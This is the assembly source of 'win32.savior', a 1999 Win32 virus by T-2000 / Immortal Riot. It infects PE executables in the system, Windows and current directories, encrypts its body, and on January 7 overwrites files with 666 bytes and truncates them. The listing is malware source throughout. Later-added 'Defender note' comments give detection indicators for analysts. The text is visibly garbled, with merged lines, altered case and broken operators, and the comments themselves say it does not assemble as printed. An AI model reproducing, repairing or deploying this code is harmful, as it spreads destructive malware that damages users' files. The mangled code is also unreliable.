Win32


; ================================================== ===========================

;

;

; Name: win32.savior v1.00

TYPE: Direct-action variable encrypting pe-infector.

SIZE: Around 1850 bytes.

Author: T-2000 / [Immortal Riot].

E-mail: t2000_@hotmail.com

Date: february 1999.

PayLoad: File-Trashing on January 7th.

;

;

Capabilities:

;

- TRUE WIN32-Compatible (WIN-95 / NT).

- Variable Encrypting (32-bit key).

- Traps Possible Errors with a SEH.

- Infects Files in Windoze System-Directory.

. - DESTRUCTIVE PAYLOAD.

;

;

; As for now only the host's import-table is being searched for GetModule-

; HandleA/W and GetProcAddress. This method is fully Win32-compatible, though it

; won't work if the aforementioned APIs aren't imported. This virus has been

; successfully tested both under Windows-95 and Windows-NT version 4.0.

;

;

; Dedicated to a Painful Death ON January 7th 1999, You Know Who you are ...

;

;

Assemble with: Tasm32 Savior.asm / m / ml

; TLINK32 Savior.obj import32.lib

Pewrsec Savior.exe

;

; ================================================== ===================================. 386

.MODEL FLAT

.Code

ORG 0

Extrn getModuleHandlea: Proc; Hosts Need to Import these for

EXTRN GETPROCADDRESS: PROC; The Virus to Be Able To Spread.

EXTRN EXITPROCESS: Proc; ONLY Used by the carrier.

Debug_mode = 0; if true, no design Occurs

And only dum?. * is infected.

; - Switch Off For Distribution! -

; Size and policy constants used by the rest of the listing.
; NOTE(review): this page is an extraction-damaged copy (identifier case and some
; operators were altered in transit), so it does not assemble as printed and the
; names below do not always match the spelling used where they are referenced.

; Length of the body that is appended to a file, per the label arithmetic.
Virus_size EQU (Virus_END-STAR)

; Length including the scratch area laid out after Virus_end (API pointer table,
; header buffers, directory buffers, encryption buffer).
Virus_size_mem EQU (Virus_end_mem-start)

; Per-directory cap: the directory scan leaves its loop once Infect_Counter
; reaches this value.
MAX_INFECT EQU 3

; Files whose size is below this many bytes are closed without being touched.
Min_size_infect EQU 4096

; Defender note: this value is written into the Checksum field of the PE header
; of every file the code modifies, and the same field is tested beforehand to
; skip files that were already modified. A PE Checksum field equal to 666h is
; therefore a usable static indicator for files touched by this listing.
Marker_file EQU 666H

Start:

Push Eax; Reserve Room for EIP.

Pushfd; Save Registers & Flags.

Pushhad

Call get_delta; get ot garization in memory.

Anti_Moron DB 9ah; Overlapping Code, Anti BP.

GET_DELTA: POP EBP

Sub EBP, (Anti_Moron-Start)

MOV EAX, 0

INIT_KEY = DWORD PTR $ -4

MOV EBX, 0

INIT_SLIDE = DWORD PTR $ -4

MOV ECX, (virus_end-encrypted) / 4

Push EBP

Decrypt_dword: xor [EBP (Virus_SIZE-4)], EAX

SUB EBP, 4

Add Eax, EBX; Slide Decryption-Key.

RCL EBX, 1; Slide Key-Slider.

Loop Decrypt_dword

POP EBP

IF ($ -start) MOD 4) GT 0

DB (4 - ($ -start) MOD 4)) DUP (90h)

ENDIF

Encrypted: MOV EAX, EBP

SUB EAX, 1000H; Calculate Image-Base.

Base_displ = DWORD PTR $ -4

Lea EBX, [EAX ((Carrier-Start) 1000H)]]

Old_eip_rva = dword PTR $ -4

MOV [ESP (9 * 4)], EBX; SET Address Host In Stack.

Call setup_seh; push seh-address on stack.

IF debug_mode

Mov Eax, 1; Unhandled Exception.Ret

Else

% OUT [Warning]: non-debug-mode !!

ENDIF

MOV ESP, [ESP 8]; Restore Original Stack.

JMP Restore_seh; Terminate Program-Flow.

Setup_seh: Push DWORD PTR FS: [ECX]; Save Original SEH-POINTER.

MOV FS: [ECX], ESP; SET OUR OWN SEH.

MOV EBX, [EAX 3CH]; Pe-header.

Add Ebx, EAX

MOV EBX, [EBX 128]; import-directory.

Add Ebx, EAX

Find_k32_dir: CMP [EBX], ECX; Reached End of Imports?

JZ JMP_REST_SEH

MOV EDI, [EBX (3 * 4)]; Get Module-Name.

Add Edi, EAX

CMP [EDI], 'NREK'; Is IT Kernel32.dll?

JNE GO_NEXT_DIR

CMP [EDI 4], '23LE'

JE Search_entries

Go_next_dir: Add EBX, (5 * 4); Go to Next Directory.

JMP FIND_K32_DIR

Search_entries: Push EBX

MOV EBX, [EBX]; Array Of RVA's.

Add Ebx, EAX

XOR EDX, EDX

MOV ESI, 1; Initialize 'Not Found'.

Mov EDI, ESI

Search_import: MOV ECX, [EBX EDX]; Reached End Of Array?

JECXZ END_IMPORTS

Add ECX, EAX; Add Base.

LOOK_4_GETMOD: PUSHAD; getModuleHandlea / W?

Lea ESI, [ECX 2]

Lea EDI, [EBP (Name_GetModuleHandlex-start)]

MOV ECX, 15

CLD

REPE CMPSB

JNE EXIT_SEARCH_GM

Pushf

MOV Al, (GET_MODULE-Unicode_Switch) - 1

CMP BYTE PTR [ESI], 'W'; Unicode Type?

JNE Store_Switch_W

XOR Al, Al

Store_Switch_W: MOV [EBP (Unicode_Switch-Start)], Al

POPF

EXIT_SEARCH_GM: POPAD

JNE LOOK_4_GETPROC

MOV ESI, EDX

LOOK_4_GETPROC: PUSHAD; getProcAddress?

Lea ESI, [ECX 2]

Lea EDI, [EBP (Name_GetProcaddress-start)]

MOV ECX, 15

REPE CMPSB

Popad

JNE GO_NEXT_ENTRY

MOV EDI, EDX

GO_NEXT_ENTRY: Add EDX, 4; Next RVA in the array.

JMP Search_import

END_IMPORTS: POP EBX

MOV EBX, [EBX (4 * 4)]

Add Ebx, EAX

Store Assumed getModuleHandle (A / W) -Address.

Push DWORD PTR [EBX ESI] POP ​​DWORD PTR [EBP (getModuleHandlex-start)]

Store Assumed GetProcaddress (A / W) -Address.

Push DWORD PTR [EBX EDI]

POP DWORD PTR [EBP (getProcaddressx-start)]

Dec ESI; getModuleHandle (A / W) FOUND?

JZ JMP_REST_SEH

Dec Edi; getProcadDress (A / W) Found?

JNZ Init_API

JMP_REST_SEH: JMP Restore_seh; Abort All.

Init_api: Lea ESI, [EBP (API_NAMES-START)]

Lea EDI, [EBP (API_ADDRESS-START)]

Setup_module: Push ESI

JMP $; use ANSI or Unicode?

Unicode_Switch = byte PTR $ -1

Add ESI, 9; Use UNICode Equivalent.

GET_MODULE: PUSH ESI

Call [EBP (getModuleHandlex-Start)]

POP ESI

OR EAX, Eax; Terminate When Not Found.

JZ JMP_REST_SEH

XCHG EBX, EAX; Save Module-Base In EBX.

Add ESI, (3 * 9); start named functions.

LOOP_GET_API: Push ESI; Retrieve API-Address of

Push EBX; Named function.

Call [EBP (getProcaddressx-start)]

CLD; Store API-Address.

Stosd

XCHG ECX, EAX; API NOT FOUND?

JECXZ JMP_REST_SEH

Find_next_api: lodsb

OR Al, Al; FOUND END OF API-NAME?

JNZ Find_Next_API

CMP [ESI], AL; this is the end of module?

Jnz loop_get_api

Lodsb

CMP [ESI], Al; End of Whole Table?

JNZ setup_module

Get Local Date & Time.

LEA EBX, [EBP (local_time-start)]

Push EBX

Call [EBP (getLocalTime-start)]

MOV Al, (Read_Header-Trash_Switch) - 1

Is IS IT TIME TO SAY GoodBye?

CMP BYTE PTR [EBX.CURRENT_MONTH], 1

JNE Start_infect

CMP BYTE PTR [EBX.CURRENT_DAY], 7

JNE Start_infect

XOR Al, Al

START_INFECT: MOV [EBP (Trash_Switch-Start)], Al

Lea ESI, [EBP (Current_Directory-start)]

MOV EBX, 260

PUSH ESI

Push ESI; Retrieve Current Path.

Push EBX

Call [EBP (getcurrentdirectorya-start)]

Add ESI, EBX

PUSH ESI

Push Ebx; Retrieve Windoze-Directory.push ESI

Call [EBP (getWindowsDirectorya-start)]

Add ESI, EBX

PUSH ESI

Push Ebx; Retrieve System-Directory.

PUSH ESI

Call [EBP (getSystemDirectorya-start)]

Infect Files in System-Directory.

Call [EBP (SetCurrentDirectorya-start)]

Call infect_directory

Infect Files in Windoze-Directory.

Call [EBP (SetCurrentDirectorya-start)]

Call infect_directory

Infect Files in Current-Directory.

Call [EBP (SetCurrentDirectorya-start)]

Call infect_directory

DISPLAY THE you-are-fucked-window?

CMP BYTE PTR [EBP (trash_switch-start)], 0

Jnz restore_seh

Display an OK-Box with a message.

PUSH 0

Lea Eax, [EBP (PayLoad_title-start)]

Push EAX

Lea Eax, [EBP (PayLoad_Text-Start)]

Push EAX

PUSH 0

Call [EBP (MessageBoxa-start)]

RESTORE_SEH: POP DWORD PTR FS: [0]; restore Original SEH.

POP EAX; trash handler-address.

EXECUTE_HOST: POPAD; Restore Registers & Flags.

POPFD

Ret; returnit.

PayLoad_title DB '....., 0; Silence Means Death ...

PayLoad_text db 'a hum4n g0d tha7 WAS Man-M4de', 0DH

DB 'Wh3re 1S Y0ur Savior N0W ?!', 0

Infect_directory:

Pushhad

Clear Infection-Counter.

AND Byte PTR [EBP (Infect_Counter-start)], 0

Lea Eax, [EBP (Search_Record-start)]

Push EAX

Lea Eax, [EBP (Search_Mask-start)]

Push EAX

Call [EBP (Findfirstfilea-start)]

Mov ESI, ESI; Save Search-Handle In ESI.

INC EAX

JZ EXIT_INF_DIR

Infect_loop: Pushad

Lea EBX, [EBP (Search_Record.Find_File_name-start)]

CMP BYTE PTR [EBP (trash_switch-start)], 0

JZ EXTENSION_OK

MOV ESI, EBX

Find_end_name: lodsb; get next byte of filename.

OR Al, Al; Found end of the asciiz?

JNZ FIND_END_NAME

MOV EAX, [ESI-5]; Get Extension DWORD.

Call Upcase_EAX

CMP EAX, 'EXE'; Standard .exe-file?

JE EXTENSION_OK

CMP EAX, 'RCS.'; Screensaver?

JNE EXIT_INFECT

EXTENSION_OK: PUSH EBX

Call [EBP (getFileAttributesa-start)]

CMP EAX, -1; Error Occurred?

JE EXIT_INFECT

Mov ESI, EAX

And Al, NOT 00000001B; Get Rid of Readonly-Flag.

Push EAX

Push EBX

Call [EBP (SetFileAttributesa-start)]

DEC EAX; Error Occurred?

JNZ EXIT_INFECT

Push ESI; PUSH FileName Attributes

Push ebx; for restore_attr.

Push Eax; Open Candidate-file.

Push EAX

Push 3; Open existing.

Push EAX

Push EAX

PUSH 80000000H OR 40000000H; Read / Write-Access.

Push EBX

Call [EBP (CreateFilea-start)]

MOV [EBP (file_handle-start)], EAX

Mov ESI, EAX

INC EAX; ERROR OCCURRED?

JZ Restore_attr

Push ESI; for CloseHandle.

Push 0; Get Candidate's FileSize.

PUSH ESI

Call [EBP (getFileSize-start)]

CMP EAX, min_size_infect; File Too Small?

JB Close_Handle

Lea EAX, [EBP (Time_Last_Write-Start]]

Push Eax; Get Filedates & Times.

Sub Eax, 8

Push EAX

Sub Eax, 8

Push EAX

PUSH ESI

Call [EBP (getfiletime-start)]

; Payload branch selector. TRASH_SWITCH names the displacement byte of the short
; jump below. START_INFECT stores into that byte either 0 (execution falls through
; into the overwrite code) when the local date is month 1, day 7, or a displacement
; computed from Read_Header (the overwrite code is skipped) on any other date.
;
; Defender note (impact assessment): on the trigger date the extension filter is
; bypassed and this path does not increment Infect_Counter, so every file of at
; least Min_size_infect bytes that the scan opens in the system, Windows and
; current directories has its first 666 bytes overwritten and is truncated to
; that length. The path then continues at Restore_Stamp, which puts the saved
; file times back, so timestamps do not reveal the damage. The original content
; is not kept anywhere by this code; affected files have to be restored from backup.
JMP $

TRASH_SWITCH = BYTE PTR $ -1

; In a debug build the overwrite code is never reached.
IF debug_mode

JMP Close_Handle

ENDIF

TRASH FILE with a Part of the Virus.

; ECX = byte count, EDX = source buffer (EBP is the in-memory start of the body).
MOV ECX, 666

MOV EDX, EBP

Call write_file

Truncate file at 666 bytes.

; ESI holds the file handle here; the file pointer sits just past the bytes written.
PUSH ESI

Call [EBP (STENDOFFILE-START)]

JMP Restore_Stamp

Read The MZ-HEADER.

Read_Header: Lea EBX, [EBP (Header-Start)]

MOV ECX, 40H

Call read_file

JNZ Close_Handle

CMP [EBX.EXE_MARK], 'ZM'; IT Must Be a true exe-file.

JNE CLOSE_HANDLE

CMP [EBX.RELOC_TABLE], 40H; Contains a new eve-header?

JB Close_Handle

MOV ESI, [EBX 3CH]

Mov Eax, ESI; Seek to PE-header.call seek_file

JZ Close_Handle

MOV ECX, 92; Read-in The PE-HEADER.

Call read_file

JNZ Close_Handle

CMP [EBX.PE_MARK], 'EP'; Verify It's A PE-HEADER.

JNE CLOSE_HANDLE

PROGRAM IS EXECUTABLE?

Test Byte Ptr [Ebx.pe_flags], 00000010B

JZ Close_Handle

Don't Infect DLL'S.

Test Byte Ptr [Ebx.pe_flags 1], 00100000B

JNZ Close_Handle

CMP [EBX.CPU_TYPE], 14CH; MUST BE A 386 File.

JNE CLOSE_HANDLE

Is IS IT ALREADY INFECTED?

CMP [EBX.CHECKSUM], Marker_File

JE close_handle

PUSH ESI

Calculate Position of the last section-header.

Movzx eax, [ebx.number_of_sections]]

Dec AX

MOV ECX, 40

Mul ECX

Calculate size of pe-header.

MOV DX, [ebx.nt_header_size]

Add DX, 24

LEA ECX, [ESI EDX]; Start Section-Headers.

Add Eax, ECX; EAX = Last Section-HEADER.

Push EAX

Seek to last section-header.

Call seek_file

Lea ESI, [EBP (last_section_header-start)]

Push EBX

MOV EBX, ESI; Read last Section-HEADER.

MOV ECX, 40

Call read_file

POP EBX

MOV EAX, [ESI.SECTION_RVA]

Add Eax, [ESI.SECTION_PHYSICAL_SIZE]

MOV [EBP (Base_Displ-start)], EAX

XCHG [EBX.EIP_RVA], EAX

MOV [EBP (Old_eip_rva-start)], EAX

Seek to the end of the section.

MOV EAX, [ESI.SECTION_PHYSICAL_OFFSET]

Add Eax, [ESI.SECTION_PHYSICAL_SIZE]

Call seek_file

MOV EAX, [ESI.SECTION_PHYSICAL_SIZE]

Add Eax, Virus_size

MOV ECX, [ebx.file_align]

Call align_eax

MOV [esi.section_physical_size], EAX

XCHG EDI, EAX; Save Physical-Size In EDI.

Mov Eax, [ESI.SECTION_VIRTUAL_SIZE]

Add Eax, Virus_Size_Mem - 1

MOV ECX, [ebx.object_align]

CALC_MEM_SIZE: INC EAX

Call align_eax

CMP EAX, EDI; Virtual-Size May Not Be

JB CALC_MEM_SIZE; Smaller Than Physical-size.

MOV [ESI.SECTION_VIRTUAL_SIZE], ESIDD EAX, [ESI.SECTION_RVA]

MOV ECX, [ebx.object_align]

Call align_eax

MOV [ebx.image_size], EAX

Set section, executable, code.

OR [ESI.SECTION_FLAGS], 11100000000000000000000000100000B

Lea EDI, [EBP (Buffer-Start)

Pushhad

Get a Random Slide-key.

Call [EBP (GettickCount-start)]

MOV [EBP (Init_SLide-start)], EAX

XCHG EBX, EAX

Get a random encryption-key.

Call [EBP (GettickCount-start)]

MOV [EBP (Init_Key-start)], EAX

MOV ESI, EBP

MOV ECX, (Virus_Size / 2)

CLD

REP MOVSW; Movsd Takes One More Byte,

Gotta Be Compact You KNOW.

MOV ECX, (virus_end-encrypted) / 4

Encrypt_dword: xor [EDI-4], EAX

SUB EDI, 4

Add Eax, EBX

RCL EBX, 1

Loop encrypt_dword

Popad

MOV EDX, EDI; Write VirusBody to End

MOV ECX, Virus_Size; of the last section.

Call write_file

POP EAX; Offset Last Object-HEADER.

Call seek_file

Write Updated Section-Header Back to File.

MOV ECX, 40

Lea Edx, [EBP (last_section_header-start)]

Call write_file

Seek to end of file.

Push 2

Push EAX

Push EAX

Push DWORD PTR [EBP (file_handle-start)]

Call [EBP (SetFilePointer-Start)]

XOR EDX, EDX; ZERO-PAD The Infected File.

Mov edi, [ebx.file_align]

Div EDI

OR EDX, EDX; File Is Already Aligned?

JZ Mark_Inf_File

Sub EDI, EDX; Howit Bytes To PAD?

ZERO_PAD: MOV ECX, 1; Write a Padding-byte.

Lea Edx, [EBP (ZERO_TOLERANCE-START)]

Call write_file

Dec EDI; We've Did 'EM All?

JNZ ZERO_PAD

Mark_INF_FILE: MOV [EBX.CHECKSUM], Marker_File

Pop Eax; Seek to Start of Pe-header.

Call seek_file

MOV ECX, 92; Write Updated pe-header.

MOV EDX, EBX

Call write_file

Increment Our Infection-Counter.

INC BYTE PTR [EBP (Infect_Counter-Start); Restore Original File-Dates & Times.

RESTORE_STAMP: Lea Eax, [EBP (Time_Last_Write-Start]

Push EAX

Sub Eax, 8

Push EAX

Sub Eax, 8

Push EAX

Push DWORD PTR [EBP (file_handle-start)]

Call [EBP (SetFileTime-start)]

Close_Handle: Call [EBP (CloseHandle-Start)]

Restore_attr: Call [EBP (SetFileAttributesa-Start)]

EXIT_INFECT: POPAD

WE'VE DID ENOUGH INFECTIONS?

CMP BYTE PTR [EBP (Infect_Counter-Start), Max_INFECT

JNB Close_Find

Find Another file.

Lea Eax, [EBP (Search_Record-start)]

Push EAX

PUSH ESI

Call [EBP (FindNextFilea-start)]

Dec EAX; Continue if Search Went OK.

JZ Infect_Loop

Close_find: Push ESI; Close Search-Handle.

Call [EBP (FindClose-start)]

EXIT_INF_DIR: POPAD

RET

EAX = OFFSET.

Returns Zf if Error.

; Seek_file: move the file pointer of the currently open file to an absolute offset.
; In:  EAX = offset from the start of the file; EBP = delta base for data references.
; Out: ZF set when the SetFilePointer call returned -1 (failure);
;      EAX = returned position + 1.
Seek_file:

; Arguments are pushed last-to-first: move method 0 (relative to start of file), ...
PUSH 0

; ... no high dword for the distance, ...
PUSH 0

; ... the low dword of the distance, ...
Push EAX

; ... and the handle that was stored when the file was opened.
Push DWORD PTR [EBP (file_handle-start)]

Call [EBP (SetFilePointer-Start)]

; -1 + 1 wraps to 0, so ZF carries the failure case back to the caller.
INC EAX

RET

Ebx = buffer.

ECX = bytes to read.

Returns Zf if Successful.

; Read_file: read ECX bytes from the currently open file into the buffer at EBX.
; In:  EBX = destination buffer, ECX = byte count, EBP = delta base.
; Out: ZF set when ReadFile returned 1; EAX = return value - 1.
; The number of bytes actually transferred is stored in Bytes_Read and is not
; examined by this routine.
Read_file:

; Last argument first: no OVERLAPPED structure.
PUSH 0

; Address of the dword that receives the transferred byte count.
Lea Eax, [EBP (Bytes_Read-start)]

Push EAX

Push ECX

Push EBX

Push DWORD PTR [EBP (file_handle-start)]

Call [EBP (ReadFile-Start)]

; Return value 1 becomes 0, so ZF means success for the callers' JNZ checks.
Dec EAX

RET

ECX = Amount of Bytes.

Edx = Buffer.

Returns Zf if Successful.

; WRITE_FILE: write ECX bytes from the buffer at EDX to the currently open file.
; In:  ECX = byte count, EDX = source buffer, EBP = delta base.
; Out: ZF set when WriteFile returned 1; EAX = return value - 1.
WRITE_FILE:

; Last argument first: no OVERLAPPED structure.
PUSH 0

; The transferred byte count is stored in the same Bytes_Read dword that Read_file uses.
Lea Eax, [EBP (Bytes_Read-start)]

Push EAX

Push ECX

Push Edx

; The immediate below is a placeholder for the file handle; the alias on the next
; line names its four bytes, presumably so they can be overwritten at run time
; (the same alias pattern is used for INIT_KEY, which is stored to elsewhere).
; Defender note: code that patches its own instruction bytes needs a section that
; is both writable and executable. The flag mask this listing ORs into the last
; section header (write | read | execute | contains-code) provides that, and a
; final section carrying that combination is a useful static triage signal.
Push 12345678H

FILE_HANDE = DWORD PTR $ -4

Call [EBP (Writefile-start)]

; Return value 1 becomes 0, so ZF means success.
Dec EAX

RET

; Align_EAX: round EAX up to the next multiple of ECX (unchanged if already a multiple).
; In:  EAX = value, ECX = alignment.
; Out: EAX = aligned value. Clobbers EDX and flags.
; An ECX of zero raises a divide fault at the DIV.
Align_EAX:

; DIV divides EDX:EAX, so the high half must be cleared first.
XOR EDX, EDX

Div ECX

OR EDX, EDX; Even Division?

JZ NO_ROUND; the no need to round-up.

; A non-zero remainder means the quotient has to be bumped by one unit.
Inc Eax; Round-Up.

; quotient * alignment = aligned value (the MUL also overwrites EDX).
NO_ROUND: MUL ECX

RET

Copyright db '(c) 1999 T-2000 / Immortal Riot.', 0

; Upcase_eax: pass each of the four bytes of EAX through Upcase_al.
; EAX is rotated by 8 bits between calls so that every byte takes a turn in AL;
; after the fourth rotation execution falls through into Upcase_al for the last
; byte, and that routine's RET returns to the caller of Upcase_eax.
; In/Out: EAX. Clobbers flags.
; NOTE(review): as printed on this page the range test is 'A'..'Z' and the
; adjustment is 'A' - 'A' (zero), so the routine changes nothing. The letter case
; of this page was altered by extraction, so the literals shown here should not be
; trusted; confirm against a clean copy before relying on them.
Upcase_eax:

ROL EAX, 8

Call Upcase_Alrol Eax, 8

Call Upcase_al

ROL EAX, 8

Call Upcase_al

ROL EAX, 8

; Upcase_al: adjust AL only when it lies inside the tested character range.
Upcase_al: CMP Al, 'A'

JB EXIT_UPCASE_AL

CMP Al, 'Z'

JA EXIT_UPCASE_AL

SUB Al, 'A' - 'A'

EXIT_UPCASE_AL: RET

IF debug_mode

Search_mask db 'DUM? *', 0

Else

Search_mask db '*. *', 0

ENDIF

API_NAMES:

DB 'Kernel32', 0

DW 'K', 'E', 'R', 'N', 'E', 'L', '3', '2', 0

DB 'CreateFilea', 0

DB 'CloseHandle', 0

DB 'setFilePointer', 0

DB 'Readfile', 0

DB 'Writefile', 0

DB 'getFilesize', 0

DB 'FindfirstFilea', 0

DB 'FINDNEXTFILEA', 0

DB 'FindClose', 0

DB 'getfiletime', 0

DB 'setFiletime', 0

DB 'getFileAttributesa', 0

DB 'setFileAttributesa', 0

DB 'getLocalTime', 0

DB 'STENDOFFILE', 0

DB 'getcurrentdirectorya', 0

DB 'setcurrentdirectorya', 0

DB 'getWindowsDirectorya', 0

DB 'getSystemDirectorya', 0

DB 'gettickcount', 0

DB 0

DB 'USER32', 0, 0, 0

DW 'u', 's', 'e', ​​'r', '3', '2', 0, 0, 0

DB 'MessageBoxa', 0

DB 0

ZERO_TOLERANCE DB 0

Name_GetProcaddress DB 'getProcaddress', 0

Name_getmoduleHandlex DB 'getModuleHandle'

IF ($ -start) MOD 4) GT 0

DB (4 - ($ -start) MOD 4)) DUP (0)

ENDIF

Virus_end:

API_ADDRESSES:

; === API's from kernel32.dll. ===

CreateFilea DD 0

CloseHandle DD 0

SetFilePointer DD 0

ReadFile DD 0

Writefile DD 0

GetFileSize DD 0

Findfirstfilea DD 0

FindNextFilea DD 0

FindClose DD 0

GetFiletime DD 0

SetFileTime DD 0GetFileAttributesa DD 0

SetFileAttributesa DD 0

GetLocalTime DD 0

STENDOFFILE DD 0

GetCurrentDirectorya DD 0

SetCurrentDirectorya DD 0

GetWindowsDirectorya DD 0

GetsystemDirectorya DD 0

GetTickCount DD 0

; === API's from user32.dll. ===

Messageboxa DD 0

GetModuleHandlex DD 0; THESE Are Being Fetched

GetProcaddressx DD 0; from the host's import.

Local_time DW 8 DUP (0)

Time_creation DD 0, 0

Time_last_access DD 0, 0

Time_last_write DD 0, 0

Infect_counter db 0

BYTES_READ DD 0

HEADER DB 92 DUP (0)

Last_section_header DB 40 DUP (0)

Search_Record DB 318 DUP (0)

Current_directory DB 260 DUP (0)

Windows_directory db 260 dup (0)

SYSTEM_DIRECTORY DB 260 DUP (0)

Buffer DB Virus_Size DUP (0)

Virus_end_mem:

Carrier:

Push 0; Terminate Current Process.

Call EXITPROCESS

; ---------------------- Some Used Structures ------------------------ ------------

EXE_HEADER STRUC

EXE_MARK DW 0; MZ-Marker (MZ Or ZM).

Image_mod_512 dw 0

Image_512_pages dw 0

Reloc_Items DW 0

HEADER_SIZE_MEM DW 0

Min_size_mem dw 0

MAX_SIZE_MEM DW 0

Program_ss dw 0

Program_sp DW 0

MZ_CHECKSUM DW 0

Program_ip dw 0

Program_cs dw 0

Reloc_table dw 0

EXE_HEADER ENDS

; PE_HEADER: overlay for the first 92 bytes of a PE header (signature, file header
; and the start of the 32-bit optional header), matching the 92-byte read and
; write the listing performs on the Header buffer. Field offsets follow the
; standard PE layout; the standard field name is given for each entry.
PE_HEADER STRUC

PE_MARK DD 0; PE-MARKER (PE / 0/0).

; Machine. The listing only proceeds when this is 14Ch (i386).
CPU_TYPE DW 0; Minimal CPU Required.

Number_of_sections dw 0; Number of Sections in PE.

; TimeDateStamp.
DD 0

; PointerToSymbolTable.
RESERVED_1 DD 0

; NumberOfSymbols.
DD 0

; SizeOfOptionalHeader; added to 24 to locate the section table.
NT_HEADER_SIZE DW 0

; Characteristics. The listing tests bit 1 (executable image) and bit 13 (DLL).
PE_FLAGS DW 0

; Magic, linker version, SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData.
DD 4 DUP (0)

; AddressOfEntryPoint. Defender note: the listing replaces this with an address
; inside the last section, so an entry point that lies in the final section is
; a triage signal alongside the Checksum marker.
EIP_RVA DD 0

; BaseOfCode, BaseOfData.
DD 2 DUP (0)

; ImageBase.
Image_base dd 0

; SectionAlignment.
Object_align DD 0

; FileAlignment.
File_Align DD 0

; Operating-system version (major, minor).
DW 0, 0

; Image version (major, minor).
DW 0, 0

; Subsystem version (major, minor).
DW 0, 0

; Win32VersionValue (reserved).
DD 0

; SizeOfImage; recomputed by the listing after the last section is enlarged.
Image_size DD 0

; SizeOfHeaders.
DD 0

; CheckSum. The listing stores Marker_file (666h) here as its "already
; modified" flag instead of a real checksum.
Checksum DD 0

PE_HEADER ENDS

Section_Header Struc

Section_name DB 8 DUP (0); Zero-Padded Section-Name.

Section_virtual_size DD 0; Memory-Size of Section.

Section_rva dd 0; start section in memory.section_physical_size dd 0; section-size in file.

Section_physical_offset DD 0; section file-offset.

Section_reserved_1 DD 0; NOT USED for Executables.

Section_reserved_2 DD 0; NOT USED for Executables.

Section_reserved_3 DD 0; NOT USED for Executables.

Section_flags DD 0; Flags of The Section.

Section_Header Ends

Find_first_next_win32 struc

File_attributes DD 0

Creation_time DD 0, 0

Last_accessed_time DD 0, 0

Last_written_time DD 0, 0

Find_file_size_high dd 0

Find_file_size_low dd 0

Find_reserved_1 DD 0

Find_reserved_2 DD 0

Find_file_name db 260 dup (0)

Find_dos_file_name dB 14 DUP (0)

Find_first_next_win32 Ends

; Date_time: overlay for the eight-word record filled in by GetLocalTime
; (same field order as the Win32 SYSTEMTIME structure).
; The payload check reads only the low byte of Current_Month and Current_day and
; compares them with 1 and 7; the year is not tested, so the trigger date recurs
; every year.
Date_time Struc

Current_Year DW 0

Current_Month DW 0

Current_day_of_week dw 0

Current_day dw 0

Current_Hour DW 0

Current_minute dw 0

Current_second dw 0

Current_MilliseCond DW 0

Date_time Ends

End Start
